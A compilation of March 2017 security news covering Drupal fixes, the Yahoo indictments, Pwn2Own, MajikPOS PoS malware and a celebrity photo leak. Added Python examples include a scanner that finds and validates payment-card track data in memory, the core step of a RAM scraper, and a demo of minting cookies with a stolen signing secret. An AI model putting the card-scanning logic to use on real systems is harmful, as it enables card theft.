The CSRF flaw, identified as CVE-2017-6379 and rated moderately critical, can be exploited to disable some blocks on a website, but the attacker needs to know the targeted block’s ID. The security hole is caused by the lack of CSRF protection on some administrative paths.

The remote code execution vulnerability, CVE-2017-6381, which has also been rated moderately critical, affects a third-party development library. The flaw, related to development dependencies, is mitigated by the fact that Composer dependencies are typically not installed, and by the default PHP execution protection in .htaccess.

Drupal 8.2.7 includes a security update for phpunit development dependencies. This version ensures that Drupal core requires the most secure version of phpunit available. Using development dependencies in production is not recommended.

Drupal also announced this week that it has found a way to make it easier for users to update the CMS, including from one major version to the next (e.g. from Drupal 8 to the future Drupal 9).

While Drupal is not as targeted as WordPress or Joomla, security firms have seen attacks aimed at websites powered by this CMS. In its latest hacked website report, Sucuri said many of the Drupal websites compromised last year had been running outdated versions.

In September, the SANS Institute’s Internet Storm Center reported seeing attempts to exploit a highly critical vulnerability that had been patched two months earlier.


Drupal version 8.2.7 address multiple vulnerabilities in the current version of the popular CMS
16.3.2017 securityaffairs Vulnerability

The Drupal development team has issued a new release of the popular content management system (CMS), Drupal 8.2.7, that fixes multiple vulnerabilities.
The list of flaws addressed in Drupal 8.2.7 includes an access bypass issue, a cross-site request forgery (CSRF) vulnerability, and a remote code execution flaw.

An access bypass flaw, tracked as CVE-2017-6377 and affecting the editor module, is considered the most severe of the three.

“When adding a private file via a configured text editor (like CKEditor), the editor will not correctly check access for the file being attached, resulting in an access bypass,” reads the description provided in the security advisory by Drupal.

Another moderately critical vulnerability is a CSRF flaw tracked as CVE-2017-6379, it is related to the lack of CSRF protection for some administrative paths. An attacker can exploit the issue to disable some blocks of a website by knowing their block ID.

Next on the list is a remote code execution vulnerability, CVE-2017-6381, also rated moderately critical. It affects a third-party library pulled in as a development dependency.

The good news is that the flaw is mitigated in most deployments: Composer development dependencies are typically not installed on production sites, and the default .htaccess shipped with Drupal blocks PHP execution in the directories concerned.

In order to improve the security of the Drupal installs, the last release Drupal 8.2.7 includes a security update for phpunit development dependencies. Basically, the Drupal core in the new release requires the most secure version of phpunit available.

It is essential to keep Drupal up to date: CMSs are favoured targets for attackers, who try to exploit known vulnerabilities using exploit code that is readily available online.

Outdated versions expose websites and their users to the risk of cyber attacks.

In September, the researchers at the SANS Institute’s Internet Storm Center reported seeing attempts to exploit a highly critical vulnerability in a third-party Drupal module, the RESTful Web Services (RESTWS) module.


Privacy Guard – Let’s evaluate privacy risks caused by the apps installed on our device
16.3.2017 securityaffairs Safety

Privacy Guard is an Android app that evaluates the risks of data privacy relying on the permissions requested by the apps installed on a device.
Mobile devices collect a large volume of personal information that could be used for malicious purposes by adversaries. In order to raise users' awareness of the possibility of data leakage and of the importance of protecting the personal data stored in smartphones, we developed 'Privacy Guard'.

Privacy Guard is an Android app that evaluates the risks of data privacy relying on the permissions requested by the apps installed on a device.

Privacy Guard was developed at Iswatlab (http://www.iswatlab.eu/?page_id=499), the cyber security lab of the Department of Engineering of the University of Sannio (Italy), from an idea of, and under the supervision of, Corrado Aaron Visaggio, who heads the lab, by Antonio Altieri, Fabrizio Giorgione, Alfredo Nazzaro, and Assunta Oropallo.

On the basis of our studies on malicious apps that exfiltrate sensitive data (http://www.iswatlab.eu/?p=461), we found that both trusted apps and malicious apps collect a lot of sensitive data. Such data can then be used for different purposes that produce revenue for the adversary who obtained it: selling the user's profile to a third party for marketing purposes, feeding OSINT platforms, committing identity theft, or carrying out frauds and scams.

The point is that the user grants the permissions which allow the data exfiltration when she installs the application on the device. The core problem is that the common user completely ignores what kind of permissions are granted and, more seriously, ignores the risk to which a certain combination of permissions exposes her privacy.

If an app requires the permission to send SMS and the permission to read contacts, SMS, and some other personal identifiable information stored in the device, it exposes the user to the possibility that the app sends that sensitive information to a third party by SMS.

Relying on such observations, we created a model that identifies which apps have the most dangerous combination of permissions for data privacy.

It is important to remark that Privacy Guard does not evaluate if a data exfiltration happens on a device, but it just identifies those apps which require a combination of permissions that can be strong indicators of activities that affect data privacy preservation.

Privacy Guard is intended first to monitor the potential risks to a user's data privacy and, as a second aim, to stimulate and increase the user's awareness, from a security perspective, of the kind of apps she installs on her device.

Let’s now look at how Privacy Guard works.

Permissions have been grouped into categories and each permission has been assigned a score, ranging from 1 to 10, to describe its dangerousness.

The permissions have been divided into four categories:

Hardware permissions: every permission which requests a direct access to a hardware device;
Data access permissions: every permission which requests a direct access to data stored on the devices;
Communication permissions: every permission which gives the chance to send information either over a network or to another device.
System permissions: every permission which can be requested only by system applications.
To compute a value representing an application's data leakage capabilities, the following formula has been developed:

(1) (Hn*Wh +Dn * Wd) * MAX(C)

Hn: the normalized sum of the scores of the hardware permissions requested by an application;
Dn: the normalized sum of the scores of the data permissions requested by an application;
MAX(C): the maximum score among the communication permissions requested by an application;
Wh: the weight assigned to hardware permissions, set empirically to 3;
Wd: the weight assigned to data permissions, set empirically to 7.
However, (1) alone is not enough to represent the data leakage capabilities of applications: some permissions are far more dangerous when used in combination with other permissions. In order to take this into account, the hardware and data access categories have been divided into sub-categories:

Hardware sub-categories            Data access sub-categories
Network access                     Data acquisition
Change hardware configuration      Personal data access
Non-combinable

The communication permissions have been divided by range and bandwidth. Every combination of these sub-categories was considered, and each combination was assigned a score ranging from 1 to 10. These values act as a penalty on the base score.
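
As an added worked example of formula (1), not the Iswatlab code: the script below scores a list of requested Android permissions with Wh = 3 and Wd = 7. The per-permission categories and 1..10 scores are a constructed, illustrative table (the article does not reproduce the lab's), "normalized" is taken to mean divided by the category's maximum possible sum so that Hn and Dn lie in [0, 1], and the sub-category penalty values are left out because the article does not give the combination table. Under these assumptions a score lies between 0 (no communication permission, hence no channel to exfiltrate through) and 100 (every permission requested).

```python
"""Privacy Guard's data-leakage score, formula (1): (Hn*Wh + Dn*Wd) * MAX(C).
Added example; the permission score table is constructed, not the lab's own."""
from typing import Dict, Iterable, List, Tuple

W_HARDWARE = 3   # Wh, set empirically by the authors
W_DATA = 7       # Wd, set empirically by the authors

# Assumed (category, dangerousness 1..10) per Android permission. The article gives the
# categories and the 1..10 scale but not the per-permission values; these are illustrative.
PERMISSION_SCORES: Dict[str, Tuple[str, int]] = {
    "CAMERA":                ("hardware", 7),
    "RECORD_AUDIO":          ("hardware", 8),
    "ACCESS_FINE_LOCATION":  ("hardware", 9),
    "READ_CONTACTS":         ("data", 8),
    "READ_SMS":              ("data", 9),
    "READ_CALL_LOG":         ("data", 7),
    "READ_EXTERNAL_STORAGE": ("data", 5),
    "INTERNET":              ("communication", 10),
    "SEND_SMS":              ("communication", 8),
    "BLUETOOTH":             ("communication", 4),
    "NFC":                   ("communication", 2),
}


def _scores(requested: Iterable[str], category: str) -> List[int]:
    """Scores of the requested permissions that fall in `category`; unknown names are ignored."""
    return [PERMISSION_SCORES[p][1] for p in requested
            if p in PERMISSION_SCORES and PERMISSION_SCORES[p][0] == category]


def normalized_sum(requested: Iterable[str], category: str) -> float:
    """Hn / Dn: sum of the requested scores in a category divided by the sum of all scores
    in that category (assumed normalization, giving a value in [0, 1])."""
    ceiling = sum(s for cat, s in PERMISSION_SCORES.values() if cat == category)
    return sum(_scores(requested, category)) / ceiling


def max_communication(requested: Iterable[str]) -> int:
    """MAX(C): the most capable exfiltration channel the app holds; 0 if it holds none."""
    return max(_scores(requested, "communication"), default=0)


def leakage_score(requested: List[str]) -> float:
    """Formula (1): (Hn*Wh + Dn*Wd) * MAX(C). Without a communication permission the
    product is 0: data the app cannot send out does not count as leakable."""
    hn = normalized_sum(requested, "hardware")
    dn = normalized_sum(requested, "data")
    return (hn * W_HARDWARE + dn * W_DATA) * max_communication(requested)


def rank_apps(apps: Dict[str, List[str]], threshold: float = 30.0) -> Tuple[List[Tuple[str, float]], int]:
    """Score every installed app, sort by descending risk, and count how many exceed the
    threshold (the summary Privacy Guard shows at the top of its screen)."""
    scored = sorted(((name, leakage_score(perms)) for name, perms in apps.items()),
                    key=lambda item: -item[1])
    return scored, sum(1 for _, s in scored if s > threshold)


if __name__ == "__main__":
    # Constructed apps: a torch app, an SMS backup tool, and a map app with contacts access.
    installed = {
        "torch": ["CAMERA"],
        "sms_backup": ["READ_CONTACTS", "READ_SMS", "SEND_SMS"],
        "maps": ["CAMERA", "ACCESS_FINE_LOCATION", "READ_CONTACTS", "INTERNET"],
    }
    ranked, over = rank_apps(installed)
    for name, score in ranked:
        print(f"{name:12s} {score:6.2f}")
    print(f"{over} application(s) exceed the threshold")
```

The example makes the model's two design decisions visible: the communication score is a multiplier, not an addend, so an app with extensive data access but no way to send it scores 0; and the data weight (7) dominates the hardware weight (3), so a contacts-plus-SMS app outranks a camera-plus-location app with the same channel.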

First of all, the application shows a message summarizing the results and the list of all the applications with their data leakage score; if one or more applications exceed a certain threshold, a message at the top of the screen indicates how many applications exceed it.

Privacy Guard

It is possible to explore the details of each app: Privacy Guard shows the list of all granted permissions with a brief description. If an application requests a particularly suspicious permission, Privacy Guard shows a warning explaining to the user how that permission can be used for malicious purposes.

The analysis can be run on the user's applications only or can include the system's applications as well. Privacy Guard is available in the Play Store at the following address:

https://play.google.com/store/apps/details?id=com.ssr.privacyguard.


A flood of dangerous bugs: Microsoft, Adobe and VMware all issue patches

16.3.2017 Novinky/Bezpečnost Vulnerabilities
Computer users should pay close attention to security updates this week. Several large companies, among them Microsoft, Adobe and VMware, have released fixes for dangerous holes.
Microsoft was first, releasing updates for several of its products on Tuesday. Its engineers had to deal with flaws in the Windows operating system itself, as well as in the Office suite and the Edge and Internet Explorer web browsers.

Several of the holes were labelled "critical", which means that they pose the highest possible danger to users.

Attackers can exploit critical flaws to smuggle practically any malicious code onto a computer. They can likewise reach the settings of the compromised machine or the data stored on its hard disk.

The other vulnerabilities discovered in the US software giant's products carry the "important" rating. In Microsoft's severity scale that still denotes a security fix, only one that is harder to exploit or less damaging than a critical flaw, so these updates should not be postponed either.

Microsoft is not alone
Adobe has also reported critical vulnerabilities in its products, specifically in the popular Flash Player, which plays video on the web and is used by hundreds of millions of people around the world, and in Shockwave Player.

These dangerous holes, too, can be exploited by attackers to take control of the compromised system.

Essentially the same applies to VMware's Workstation and Fusion virtualization software. For these programs, too, the developers had to release fixes that stop attackers from getting into the operating system.

Do not delay installation
Given the possible risks, security experts recommend not delaying installation of the patches. "We recommend updating as soon as possible," said Pavel Bašta, security analyst at the national security team CSIRT.CZ, which is operated by the CZ.NIC association.

Updates for the products of all the affected companies can be obtained through automatic updates. Users who do not have automatic installation enabled can download the fixes directly from the individual vendors' websites.


The Kremlin distances itself from the attack on Yahoo

16.3.2017 Novinky/Bezpečnost BigBrother
On Thursday the Kremlin ruled out any involvement of Russian intelligence services in illegal cyber operations. President Vladimir Putin's spokesman Dmitry Peskov said so in response to the US Department of Justice charging two Russian intelligence officers and two other people over the attack on the internet company Yahoo three years ago.
Peskov told reporters that he had no official information about the charges yet and that everything he knew so far came from the media.

"We have said repeatedly that there can be no question of any involvement of any Russian agency, including the FSB (Federal Security Service), in any illegal computer activities," Peskov stressed.

On Wednesday the US Department of Justice announced that it had charged two Russian intelligence officers and two hackers from former Soviet republics in connection with the theft of data from Yahoo accounts in 2014.

According to The Washington Post, this is the first indictment of its kind against "Russian government officials". It concerns two officers of the Russian intelligence service FSB and two hackers whom the Russians allegedly hired.

More than a billion sets of credentials
Last September Yahoo's management announced that data from 500 million accounts had been stolen from its servers in 2014. In December Yahoo representatives then confirmed that more than a billion sets of credentials had been stolen in another attack, dating from 2013.

Yahoo has not yet said whether the two attacks were related. The attacks also affected the sale of Yahoo's core business to the telecommunications giant Verizon.

According to the company, the stolen information may include names, e-mail addresses, telephone numbers, dates of birth and so-called security questions and their answers.

According to expandedramblings.com, a billion people use Yahoo's services every month. 280 million people have an e-mail account there, 81 million of them in the US.


The United States charges two Russian spies over the hacking attack on Yahoo

16.3.2017 Novinky/Bezpečnost BigBrother
The US Department of Justice has charged two agents of the Russian intelligence service FSB and two hackers they hired in connection with the attack on the servers of the internet company Yahoo in September 2014, in which data on half a billion users was obtained. The Washington Post noted that this is the first time the US has charged Russian officials over a cyber attack. The department took the step to show hackers that it will prosecute such attacks vigorously.
The announcement came after Kazakhstan-born Karim Baratov, a Canadian citizen, was detained in Canada on Tuesday. He is one of the hired hackers. The other is Alexey Belan, who ranked among the most successful hackers and already faces two earlier indictments over attacks on Nevada and California technology companies in 2012 and 2013. He was in custody in Greece but returned to Russia.

Photo: Mary McCord of the Department of Justice speaks in front of posters of the suspected FSB agents

The charged FSB agents are Dmitry Dokuchaev and his superior Igor Sushchin. According to the Interfax agency, however, Dokuchaev was arrested in Moscow last year on a charge of treason for allegedly passing information to the CIA. He had decided to cooperate with the FSB in order to escape prosecution for bank card fraud.

The charges are the result of a two-year investigation by the FBI's San Francisco office.

Photo: Officials of the US Department of Justice put up a wanted poster for Igor Sushchin (Yuri Gripas, Reuters)

In the attack the FSB sought to obtain information for intelligence purposes, targeting journalists, dissidents and US government officials. The hackers were allowed to exploit the attack for their own enrichment.

The charges concern computer hacking, wire fraud, theft of trade secrets and economic espionage.

The attack on Yahoo was said to be part of a broader cyber attack on the United States. According to the Department of Justice, the hackers acted on the orders of the Russian agents. According to the FBI they were among the biggest cyber criminals, and the involvement of the FSB makes the act all the more serious.

Photo: The FBI is also seeking FSB agent Dmitry Dokuchaev in connection with the hacking attack (Yuri Gripas, Reuters)

In the case of the FSB agents, however, the charges will probably come to nothing, because the two countries have no treaty on extraditing people suspected of crimes, The Washington Post pointed out. According to US officials, the charges and sanctions will nevertheless have a deterrent effect. Moreover, indicted people sometimes travel to countries where they can be apprehended.

A billion accounts stolen
Last September the company announced that data from 500 million accounts had been stolen from its servers in 2014. In December Yahoo representatives then confirmed that more than a billion sets of credentials had been stolen in another attack, dating from 2013 and the largest in history. Yahoo has not yet said whether the two attacks were related. The attacks also affected the sale of Yahoo's core business to the telecommunications giant Verizon.

According to the company, the stolen information may include names, e-mail addresses, telephone numbers, dates of birth and so-called security questions and their answers.

According to expandedramblings.com, a billion people use Yahoo's services every month. 280 million people have an e-mail account there, 81 million of them in the US.

The Washington Post noted that this attack was unrelated to the hacking of the Democratic Party or to Russia's possible interference in last year's presidential election.


Classic phishing was most likely behind the massive Yahoo data leak
16.3.2017 Živě.cz Phishing

A San Francisco court has published the indictment (PDF) of two alleged agents of Russia's FSB and two hackers said to be behind the attacks on Yahoo in which millions of user accounts leaked from the American web service.
It appears they did not get into Yahoo through some technically sophisticated backdoor; according to the FBI it was most likely phishing. In other words, they somehow persuaded a key administrator to unwittingly hand them access to the system.
It shows once again that however good an operator's defences against conventional attacks may be, everything can still collapse because of, say, a fake e-mail to a responsible person who holds sufficient privileges.

At the end of last year, after months of investigation, Yahoo admitted that someone had illegally obtained data on half a billion users from its servers. The FBI subsequently identified Russian agents as the culprits.


It's Fappening Again! Private Photos of Emma Watson and Others Leaked Online
16.3.2017 thehackernews Incident


Taking nude selfies is not a crime, but it can still land you in trouble. Here is how.
Almost three years after a wave of private photographs of celebrities leaked online, "The Fappening 2.0" appears to be underway with the circulation of alleged naked pictures of female celebrities, including Emma Watson and Amanda Seyfried on Reddit and 4chan.
Back in 2014, anonymous hackers flooded the Internet with private photographs of major celebrities, including Jennifer Lawrence, Kim Kardashian, Kate Upton and Kirsten Dunst by hacking thousands of Apple's iCloud accounts.
The Fappening hackers have since been sent to prison.
The Fappening 2.0: It's Happening Again!
However, in the latest leak, which has been heralded online as "The Fappening 2.0," the personal photographs of Amanda Seyfried and Emma Watson — ranging from regular selfies to explicitly sexual photos — have been leaking online since Tuesday night.
According to a screenshot from an original 4chan thread, unknown hackers will be posting more intimate photos of female celebrities, including Kylie Jenner, Marisa Tomei, Jennifer Lawrence and several others, over the next few days, which indicates it's just the beginning of The Fappening 2.0.
The affected celebrities did not immediately comment on the invasion of their privacy, but the photographs appear to be authentic.
A representative for Watson has also confirmed that she is taking legal action against the latest leak and that some of the images circulating online are legitimate, saying:
"Photos from a clothes fitting Emma had with a stylist a couple of years ago have been stolen. They are not nude photographs. Lawyers have been instructed and we are not commenting further."
While the leaked images of Watson show the actor posing in various swimsuits and outfits in front of a mirror, the alleged photos of actors Amanda Seyfried and Jillian Murray are much more explicit, appearing to show the stars nude and, in some images, engaging in sexual activity.
There are also pictures and videos that the leaker claims show Watson filming herself naked in a bathtub and, in another, masturbating. Since the face of the woman in the shots cannot be seen, this cannot be confirmed.
There is yet no information on the source of the leaks or how the personal photos of celebrities were obtained, but the anonymous hackers are claiming that these leaks are just the tip of an iceberg and they're about to release the next batch of celebrities to get their photos leaked.
The most famous celebrities in the list of next wave of private photographs of celebrities appear to be Marisa Tomei, Kylie Jenner, and Jennifer Lawrence.
How To Keep Your Private Photos Private
If you are looking for the surest way to keep your photos off the Internet, the simplest solution is not to take them. If you do, there are a few steps that reduce the risk:
Do not click suspicious links or open unexpected attachments in e-mail.
When in doubt, contact the sender to confirm that he or she actually sent the message.
Never provide personal or financial information to anyone by e-mail.
No service, be it Google, Apple or Microsoft, ever asks for your password or other sensitive personal information by e-mail.
Change your passwords and security questions regularly, and treat security-question answers as passwords: use answers that cannot be looked up or guessed.
Enable two-factor authentication on your accounts and choose a strong, unique password for every account. If you cannot create and remember a different password for each site, use a good password manager.


Pwn2Own 2017: Experts Hack Edge, Safari, Ubuntu

16.3.2017 securityweek Congress

Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu and Adobe Reader on the first day of the Pwn2Own 2017 competition taking place these days alongside the CanSecWest conference in Vancouver, Canada.

The prize pool for this year’s event is $1 million and 11 teams have signed up to hack products in four categories. On the first day of the competition, participants earned a total of $233,000 for the exploits they disclosed.

A researcher from Chinese security firm Qihoo360 earned $50,000 for hacking Adobe Reader on Windows. The hacker leveraged remote code execution and information disclosure vulnerabilities in Windows, and a JPEG2000 heap overflow in Reader to complete the task.

Adobe Reader was also cracked by Team Sniper from Tencent Security, which exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits.

Researchers Samuel Groß and Niklas Baumstark earned $28,000 for hacking Apple’s Safari web browser using a combination of a use-after-free flaw, three logic bugs and a null pointer dereference. Their attempt was only partially successful, but they did earn style points for displaying a special message on the targeted Mac’s touch bar.

The Beijing-based Chaitin Security Research Lab earned $35,000 for gaining root access to a Mac through Safari. The team exploited six flaws, including one information disclosure, four type confusions and a use-after-free.

The same team also successfully hacked Ubuntu Desktop via a heap out-of-bounds access in the Linux kernel, which earned them $15,000. It’s worth noting that this is the first Pwn2Own where participants get rewarded for finding local privilege escalation vulnerabilities.

The highest reward of the first day, $80,000, was earned by Tencent Security’s Team Ether, which managed to hack Microsoft’s Edge browser using an arbitrary write bug in Chakra and a logic bug to escape the sandbox.

Each of these contestants also earned Master of Pwn points, and the researcher or team with the highest total will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Team Ether had signed up to hack Windows as well, but they withdrew the entry. Researcher Ralf-Philipp Weinmann, who targeted Edge, also withdrew his entry. Richard Zhu and Team Sniper failed to hack Safari and Google Chrome, respectively, in the allocated timeframe.


New MajikPOS Malware targets businesses across North America and Canada
16.3.2017 securityaffairs Virus

Security experts at Trend Micro have discovered a new PoS malware, tracked as MajikPOS, that is targeting businesses in North America, including Canada.

The experts explained that MajikPOS has the same capabilities as other PoS malware, but its modular approach to execution sets it apart.

The first attacks powered with MajikPOS were observed at the end of January 2017, the malicious code borrows features from PoS malware and remote access Trojan (RAT).

“We’ve uncovered a new breed of point-of-sale (PoS) malware currently affecting businesses across North America and Canada: MajikPOS (detected by Trend Micro as TSPY_MAJIKPOS.A).” reads the analysis shared by Trend Micro.”Like a lot of other PoS malware, MajikPOS is designed to steal information, but its modular approach in execution makes it distinct. “

Researchers have previously seen PoS malware with multiple components, each handling a different task (for instance FastPOS and its updated version, Gorynych and ModPOS), but according to Trend Micro MajikPOS's modular structure is different: MajikPOS needs only one additional component from the server to carry out its RAM-scraping routine.

MajikPOS is written on the .NET Framework and uses an encrypted communication channel to avoid detection.

The crooks did not use sophisticated techniques to compromise the targets, they were able to gain access to the PoS systems through brute-force attacks on Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP) services protected by easy-to-guess passwords.

In some cases, the cyber criminals used Command-line FTP (File Transfer Protocol) or a modified version of Ammyy Admin to install the MajikPOS malware.

In some cases, attackers have used RATs previously installed on the system, the researchers noticed that in several attacks RATs were installed on the targets’ machines between August and November 2016.

Looking at MajikPOS's other tricks, the experts noticed that its operators used common lateral-movement tools to reach other systems on the victim's network.

Once installed on a machine, the malicious code connects to the C&C server and receives a configuration file with three entries to be used later.

Below an image of the C&C panel that is called Magic Panel.

MajikPOS C2 Panel

The RAM scraping component of the threat is called Conhost.exe, it scans the memory searching for card data of the major card issuers, including American Express, Diners Club, Discover, Maestro, Mastercard, and Visa.

It verifies the credit card’s track data and then sends it to the C&C server via HTTP POST.

“After verifying the credit card’s track data, the information is sent to the C&C server via HTTP POST, Action=”bin”.” continues the post published by Trend Micro.
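To make the RAM-scraping step concrete, here is an added Python example (not MajikPOS code and not from Trend Micro) of the logic a scraper applies to a memory dump: regular expressions for Track 1 and Track 2 data, the Luhn check that separates real card numbers from noise, and issuer identification from the leading digits. The memory buffer is constructed for the example and contains only industry test card numbers. The same checks serve the defender: a memory scanner or DLP rule that finds clear-text track data on a PoS host has found exactly what the malware is looking for.

```python
"""Find payment-card track data in a memory buffer and validate it.

Same logic a RAM scraper runs over process memory; the same checks let a
defender's memory scanner or DLP rule flag clear-text track data.
"""
import re

# Track 1: %B<PAN>^<NAME>^<YY><MM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{2})(\d{2})(\d{3})(\d*)\?")
# Track 2: ;<PAN>=<YY><MM><service code><discretionary>?
TRACK2 = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")


def luhn_ok(pan):
    """Luhn check digit: the cheap test that separates card numbers from noise."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def issuer(pan):
    """Brand from the leading digits (the same brands MajikPOS searches for)."""
    p2, p4 = int(pan[:2]), int(pan[:4])
    if pan[0] == "4":
        return "Visa"
    if p2 in (34, 37):
        return "American Express"
    if 51 <= p2 <= 55 or 2221 <= p4 <= 2720:
        return "Mastercard"
    if pan.startswith("6011") or p2 == 65:
        return "Discover"
    if p2 in (36, 38) or 300 <= int(pan[:3]) <= 305:
        return "Diners Club"
    return "unknown"


def scan_memory(buf):
    """Return validated card records found in buf, in the order they appear."""
    found = []
    for regex, track in ((TRACK1, 1), (TRACK2, 2)):
        for m in regex.finditer(buf):
            pan = m.group(1).decode()
            yy, mm = (m.group(3), m.group(4)) if track == 1 else (m.group(2), m.group(3))
            if not luhn_ok(pan) or not 1 <= int(mm) <= 12:
                continue               # noise that merely looks like track data
            found.append({"offset": m.start(), "track": track, "pan": pan,
                          "expiry": f"20{yy.decode()}-{mm.decode()}",
                          "issuer": issuer(pan)})
    return sorted(found, key=lambda r: r["offset"])


# Constructed buffer: industry test card numbers embedded in other process junk.
SAMPLE_MEMORY = (
    b"\x00\x00Terminal ready\x00"
    b"%B4111111111111111^DOE/JOHN^2512101000000000000?\x00"
    b"order=42;total=19.99\x00"
    b";5555555555554444=2703201123456789?\x00"
    b";4111111111111112=2512101?\x00"        # fails Luhn: a scraper would skip it too
    b";378282246310005=2901101?"
)

if __name__ == "__main__":
    for rec in scan_memory(SAMPLE_MEMORY):
        print(rec)
```

The Luhn and expiry-month checks are what the article calls verifying the track data: they cost nothing and keep the HTTP POST to the C&C free of false positives, which is also why a defensive scanner should apply them before raising an alert.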

Further investigation allowed the experts to discover that the registrant for the Magic Panel servers also registered many other websites used to sell stolen credit card data.

According to Trend Micro, the websites run by the gang behind the threat currently offer around 23,400 stolen credit card tracks for sale, priced between $9 and $39 depending on the type of card. The crooks also offer bulk packages of 25, 50 and 100 cards, priced at $250, $400 and $700 respectively.

“Some of these websites were advertised on carding forums as early as February 2017 by a user called “MagicDumps”, who has been updating the forums for new dumps based on location—mostly in the U.S. and Canada.” added Trend Micro.

As mitigation, the experts recommend properly configured chip-and-PIN (EMV) acceptance with end-to-end encryption of card data, so that clear-text track data never sits in the terminal's memory; unfortunately, many merchants still have not implemented the PIN part of chip-and-PIN.


Two Russian former FSB agents and two hackers indicted for 2014 Yahoo data breach
16.3.2017 securityaffairs BigBrothers

The US authorities charged two former Russian FSB agents and two hackers for 2014 Yahoo data breach that caused the exposure of 500 Million Yahoo Accounts.
Last year it was disclosed the news of the 2014 Yahoo data breach that compromised over 500 million Yahoo user accounts.

At the time of the public disclosure made by Yahoo, the representatives of the company added that security experts suspect the involvement of nation-state actors.

“We have confirmed that a copy of certain user account information was stolen from the company’s network in late 2014 by what it believes is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers.” reads the security notice issued by Yahoo.

“The ongoing investigation suggests that stolen information did not include unprotected passwords, payment card data, or bank account information; payment card data and bank account information are not stored in the system that the investigation has found to be affected. Based on the ongoing investigation, Yahoo believes that information associated with at least 500 million user accounts was stolen and the investigation has found no evidence that the state-sponsored actor is currently in Yahoo’s network. Yahoo is working closely with law enforcement on this matter.”

The US authorities have charged two Russian intelligence officers and two criminal hackers with taking part in the 2014 Yahoo hack.

The four defendants are:

Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and a Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, Dokuchaev's superior within the FSB, and a Russian national and resident.
Alexsey Alexseyevich Belan, aka "Magg," 29 — a Russian national and resident who has been on the FBI's Most Wanted Hackers list.
Karim Baratov, aka "Kay," "Karim Taloverov" and "Karim Akehmet Tokbergenov," 22 — a Canadian and Kazakh national and a resident of Canada.
The members of the group are charged with:

Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
“A grand jury in the Northern District of California has indicted four defendants, including two officers of the Russian Federal Security Service (FSB), for computer hacking, economic espionage and other criminal offenses in connection with a conspiracy, beginning in January 2014, to access Yahoo’s network and the contents of webmail accounts.” the Department of Justice announced yesterday.

According to the prosecutors, the hackers accessed at least 30 million accounts for a spam campaign and stole the e-mail contents of thousands of targeted people.

2014 Yahoo data breach

According to the indictment, Belan downloaded the Yahoo user database, an archive containing usernames, recovery e-mail addresses and phone numbers as well as "certain information required to manually create, or "mint," account authentication web browser "cookies" for more than 500 million Yahoo accounts."
With that information the hackers gained unauthorized access to the contents of accounts at other webmail providers, including Google. Russian and American officials, Russian journalists, and employees of financial services and other businesses were the gang's preferred targets.
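The "information required to mint cookies" deserves a closer look. As an added example (not Yahoo's cookie format, which the indictment does not describe, and not code from the page), the following Python shows a typical HMAC-signed session cookie: whoever holds the server-side signing secret can mint a cookie for any account without ever touching its password or its bcrypt hash, and only rotating the secret or invalidating sessions issued before a given time closes that door. The secret, the usernames and the timestamps are constructed for the example.

```python
"""Minting and verifying HMAC-signed session cookies.

Whoever holds the signing secret can mint a valid cookie for any account
without knowing its password; the secret and a revocation list are the
only things standing between a stolen database and account takeover.
"""
import base64
import hashlib
import hmac
import time


def mint_cookie(secret, username, lifetime=3600, now=None):
    """Issue user|issued-at|expiry, authenticated with HMAC-SHA256."""
    iat = int(time.time() if now is None else now)
    payload = f"{username}|{iat}|{iat + lifetime}".encode()
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + b"|" + tag).decode()


def verify_cookie(secret, cookie, now=None, revoked=None):
    """Return the username if the cookie is genuine, unexpired and not revoked.

    revoked maps username -> timestamp: cookies issued before it are dead
    (set it when a password is reset or a breach is discovered).
    """
    try:
        raw = base64.urlsafe_b64decode(cookie)
    except (ValueError, TypeError):
        return None
    payload, sep, tag = raw.rpartition(b"|")
    if not sep:
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None                       # forged, or signed with a rotated key
    try:
        username, iat, exp = payload.decode().rsplit("|", 2)
        iat, exp = int(iat), int(exp)
    except ValueError:
        return None
    now = time.time() if now is None else now
    if exp < now:
        return None
    if iat < (revoked or {}).get(username, 0):
        return None
    return username


if __name__ == "__main__":
    # Constructed demo secret; a real one is long, random and kept out of the user database.
    secret = b"constructed-demo-secret"
    forged = mint_cookie(secret, "victim@example.com")    # no password needed
    print("forged cookie accepted as:", verify_cookie(secret, forged))
    print("after key rotation:", verify_cookie(b"rotated-secret", forged))
```

The lesson for anyone designing sessions: hashing passwords well (the bcrypt Yahoo mentions) does nothing if the cookie-signing material lives in the same database, and a breach response has to rotate that material and invalidate outstanding sessions, not just force password resets.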

The United States has asked for the extradition of the suspects who are in Russia, which is difficult in the absence of an extradition treaty with Russia. Finally, a note on the hackers: according to Assistant Attorney General Mary McCord, they were not involved in the DNC hack.


New Acronym Malware Possibly Linked to Potao

15.3.2017 securityweek Virus
Researchers at Arbor Networks have come across a new piece of malware that could be linked to the Trojan used in the campaign known as Operation Potao Express.

The malware caught the attention of Arbor Networks researchers after a link to a VirusTotal analysis was posted on Twitter by an Italy-based expert who uses the online moniker Antelox. An analysis of the Trojan and its dropper showed that the threat could be linked to the Potao malware family.

The Potao malware, which has been described as a “universal modular cyber espionage toolkit,” has been around since at least 2011, but it was first analyzed in detail in 2015 by ESET.

